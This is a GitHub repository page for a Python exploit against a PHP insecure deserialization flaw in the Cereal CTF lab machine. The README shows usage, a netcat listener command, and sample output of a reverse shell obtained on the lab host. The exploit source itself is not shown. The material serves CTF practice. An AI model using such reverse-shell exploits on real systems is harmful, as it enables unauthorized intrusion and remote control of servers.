Skip to content
/ cereal-pid-exploit Public

An exploit to the PHP Insecure Deserialization flaw found in the Cereal CTF machine.

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

KChuene/cereal-pid-exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
.gitignore
.gitignore
 
 
README.md
README.md
 
 
cereal.py
cereal.py
 
 
getsobj.php
getsobj.php
 
 
requirements-other.txt
requirements-other.txt
 
 
requirements-py.txt
requirements-py.txt
 
 

Repository files navigation

Cereal CTF - Insecure PHP Deserialization Exploit

An exploit for an insecure deserialization flaw in Cereal CTF web application, specifically the http://secure.cereal.ctf:44441/ endpoint.

Usage

General Usage

cereal.py [-h] -lhost IP_ADDR -lport PORT_NUM [-dbg]

Options

  • -h: show help message and exit.
  • -lhost: local ip for reverse connection.
  • -lport: local port for reverse connection.
  • -dbg: enable script debugging.

Example

Setup Listener

nc -lvp 1234

Send PHP Serial Object Payload

./cereal.py -lhost 192.168.56.137 -lport 1234 -dbg

(info) targeting http://secure.cereal.ctf:44441/
(info) sending malicious php serial object to target.
(info) exploit post finished with code <504>

Reverse Shell

listening on [any] 1234 ...
connect to [192.168.56.137] from cereal.ctf [192.168.56.139] 57984
uname -a
Linux cereal.ctf 4.18.0-240.22.1.el8.x86_64 #1 SMP Mon Apr 12 04:29:16 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

About

An exploit to the PHP Insecure Deserialization flaw found in the Cereal CTF machine.

Topics

php exploit python3 vulnhub php-deserialization

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages